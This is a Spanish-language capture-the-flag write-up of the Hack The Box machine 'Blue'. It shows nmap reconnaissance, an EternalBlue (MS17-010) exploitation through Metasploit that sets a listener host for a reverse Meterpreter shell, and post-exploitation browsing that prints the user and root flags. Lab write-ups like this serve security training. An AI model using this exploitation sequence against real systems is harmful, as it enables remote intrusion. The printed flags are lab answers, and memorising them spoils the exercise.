Blue

Sobre esta maquina: HTB

Sistema Operativo: Windows

Skills Usados:

SMB
Ethernal Blue

Primer scann:

nmap -p- --open -sS -T4 -Pn -n 10.10.10.40 -oN First_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-25 21:20 EDT Nmap scan report for 10.10.10.40 Host is up (0.14s latency). Not shown: 65421 closed tcp ports (reset), 105 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 45.79 seconds

Scann de versiones y scripts:

nmap -p139,135,445 -sVC -n 10.10.10.40 -oN SVC_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-25 21:22 EDT Nmap scan report for 10.10.10.40 Host is up (0.14s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2025-05-26T02:22:42+01:00 | smb2-time: | date: 2025-05-26T01:22:43 |_ start_date: 2025-05-26T01:19:04 | smb2-security-mode: | 2:1:0: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_clock-skew: mean: -20m04s, deviation: 34m36s, median: -5s

Enumeramos los shares de smb:

nmap --script smb-enum-shares.nse -p445 -n 10.10.10.40 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-25 21:32 EDT Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 0.00% done Stats: 0:00:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 0.00% done Nmap scan report for 10.10.10.40 Host is up (0.14s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \10.10.10.40\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Anonymous access: | Current user access: | \10.10.10.40\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Anonymous access: | Current user access: | \10.10.10.40\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: Remote IPC | Anonymous access: READ | Current user access: READ/WRITE

| \10.10.10.40\Share: | Type: STYPE_DISKTREE | Comment: | Anonymous access: | Current user access: READ | \10.10.10.40\Users: | Type: STYPE_DISKTREE | Comment: | Anonymous access: |_ Current user access: READ

Vemos que es vulnerable a MS17-010 asi que utilizaremos metasploit para ingresar:

msfconsole
Name Disclosure Date Rank Check Description
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption [msf](Jobs:0 Agents:0) >> use 0 [msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts 10.10.10.40 rhosts => 10.10.10.40 [msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost 10.10.14.3

Estamos dentro buscamos las flags:

(Meterpreter 1)(C:\Windows\system32) > cd c:// (Meterpreter 1)(c:) > dir Listing: c:\

Mode Size Type Last modified Name

040777/rwxrwxrwx 0 dir 2017-07-21 02:56:27 -0400 $Recycle.Bin 040777/rwxrwxrwx 0 dir 2022-02-18 10:11:31 -0500 Config.Msi 040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings 040777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs 040555/r-xr-xr-x 4096 dir 2022-02-18 10:02:50 -0500 Program Files 040555/r-xr-xr-x 4096 dir 2017-07-14 12:58:41 -0400 Program Files (x86) 040777/rwxrwxrwx 4096 dir 2017-12-23 21:23:01 -0500 ProgramData 040777/rwxrwxrwx 0 dir 2022-02-18 09:09:14 -0500 Recovery 040777/rwxrwxrwx 0 dir 2017-07-14 09:48:44 -0400 Share 040777/rwxrwxrwx 4096 dir 2025-05-25 21:43:43 -0400 System Volume Information 040555/r-xr-xr-x 4096 dir 2017-07-21 02:56:23 -0400 Users 040777/rwxrwxrwx 16384 dir 2025-05-25 21:28:20 -0400 Windows 000000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys (Meterpreter 1)(c:) > cd users (Meterpreter 1)(c:\users) > dir Listing: c:\user Mode Size Type Last modified Name

040777/rwxrwxrwx 8192 dir 2017-07-21 02:56:36 -0400 Administrator 040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 All Users 040555/r-xr-xr-x 8192 dir 2009-07-14 03:07:31 -0400 Default 040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Default User 040555/r-xr-xr-x 4096 dir 2011-04-12 03:51:29 -0400 Public 100666/rw-rw-rw- 174 fil 2009-07-14 00:54:24 -0400 desktop.ini 040777/rwxrwxrwx 8192 dir 2017-07-14 09:45:53 -0400 haris (Meterpreter 1)(c:\users) > cd haris (Meterpreter 1)(c:\users\haris) > dir Listing: c:\users\haris
Mode Size Type Last modified Name
040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 AppData 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Application Data 040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Contacts 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Cookies 040555/r-xr-xr-x 0 dir 2017-12-23 21:23:23 -0500 Desktop 040555/r-xr-xr-x 4096 dir 2017-07-15 03:58:33 -0400 Documents 040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Downloads 040555/r-xr-xr-x 4096 dir 2017-07-15 03:58:33 -0400 Favorites 040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Links 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Local Settings 040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Music 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 My Documents 100666/rw-rw-rw- 524288 fil 2021-01-15 04:41:00 -0500 NTUSER.DAT 100666/rw-rw-rw- 65536 fil 2017-07-14 10:03:15 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf 100666/rw-rw-rw- 524288 fil 2017-07-14 10:03:15 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer0000000 0000000000001.regtrans-ms 100666/rw-rw-rw- 524288 fil 2017-07-14 10:03:15 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer0000000 0000000000002.regtrans-ms 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 NetHood 040555/r-xr-xr-x 0 dir 2017-07-15 03:58:32 -0400 Pictures 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 PrintHood 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Recent 040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Saved Games 040555/r-xr-xr-x 0 dir 2017-07-15 03:58:33 -0400 Searches 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 SendTo 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Start Menu 040777/rwxrwxrwx 0 dir 2017-07-14 09:45:37 -0400 Templates 040555/r-xr-xr-x 0 dir 2017-07-15 03:58:32 -0400 Videos 100666/rw-rw-rw- 262144 fil 2025-05-25 21:44:05 -0400 ntuser.dat.LOG1 100666/rw-rw-rw- 0 fil 2017-07-14 09:45:36 -0400 ntuser.dat.LOG2 100666/rw-rw-rw- 20 fil 2017-07-14 09:45:37 -0400 ntuser.ini (Meterpreter 1)(c:\users\haris) > cd Desktop (Meterpreter 1)(c:\users\haris\Desktop) > dir Listing: c:\users\haris\Desktop Mode Size Type Last modified Name
100666/rw-rw-rw- 282 fil 2017-07-15 03:58:32 -0400 desktop.ini 100444/r--r--r-- 34 fil 2025-05-25 21:20:01 -0400 user.txt (Meterpreter 1)(c:\users\haris\Desktop) > cat user.txt f5aebf0a03c650ec5c87833638193a70 (Meterpreter 1)(c:\USers) > dir Listing: c:\USers
Mode Size Type Last modified Name
040777/rwxrwxrwx 8192 dir 2017-07-21 02:56:36 -0400 Administrator 040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 All Users 040555/r-xr-xr-x 8192 dir 2009-07-14 03:07:31 -0400 Default 040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Default User 040555/r-xr-xr-x 4096 dir 2011-04-12 03:51:29 -0400 Public 100666/rw-rw-rw- 174 fil 2009-07-14 00:54:24 -0400 desktop.ini 040777/rwxrwxrwx 8192 dir 2017-07-14 09:45:53 -0400 haris (Meterpreter 1)(c:\USers) > cd Administrator (Meterpreter 1)(c:\USers\Administrator) > dir Listing: c:\USers\Administrator
Mode Size Type Last modified Name
040777/rwxrwxrwx 0 dir 2025-05-25 21:20:01 -0400 AppData 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Application Data 040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Contacts 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Cookies 040555/r-xr-xr-x 0 dir 2017-12-23 21:22:48 -0500 Desktop 040555/r-xr-xr-x 4096 dir 2017-07-21 02:56:40 -0400 Documents 040555/r-xr-xr-x 4096 dir 2022-02-18 10:21:10 -0500 Downloads 040555/r-xr-xr-x 0 dir 2017-07-21 02:56:42 -0400 Favorites 040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Links 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Local Settings 040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Music 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 My Documents 100666/rw-rw-rw- 786432 fil 2025-05-25 21:20:04 -0400 NTUSER.DAT 100666/rw-rw-rw- 65536 fil 2017-07-21 02:57:29 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf 100666/rw-rw-rw- 524288 fil 2017-07-21 02:57:29 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer0000000 0000000000001.regtrans-ms 100666/rw-rw-rw- 524288 fil 2017-07-21 02:57:29 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer0000000 0000000000002.regtrans-ms 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 NetHood 040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Pictures 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 PrintHood 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Recent 040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Saved Games 040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Searches 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 SendTo 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Start Menu 040777/rwxrwxrwx 0 dir 2017-07-21 02:56:24 -0400 Templates 040555/r-xr-xr-x 0 dir 2017-07-21 02:56:40 -0400 Videos 100666/rw-rw-rw- 262144 fil 2025-05-25 21:44:05 -0400 ntuser.dat.LOG1 100666/rw-rw-rw- 0 fil 2017-07-21 02:56:24 -0400 ntuser.dat.LOG2 100666/rw-rw-rw- 20 fil 2017-07-21 02:56:24 -0400 ntuser.ini (Meterpreter 1)(c:\USers\Administrator) > cd Desktop (Meterpreter 1)(c:\USers\Administrator\Desktop) > dir Listing: c:\USers\Administrator\Desktop
Mode Size Type Last modified Name
100666/rw-rw-rw- 282 fil 2017-07-21 02:56:40 -0400 desktop.ini 100444/r--r--r-- 34 fil 2025-05-25 21:20:01 -0400 root.txt (Meterpreter 1)(c:\USers\Administrator\Desktop) > cat root.txt 68aa41e8bfa9636154c25586e151ffdd

Y con esta flag damos la maquina por terminada.

PreviousCypher NextJerry

Last updated 16 days ago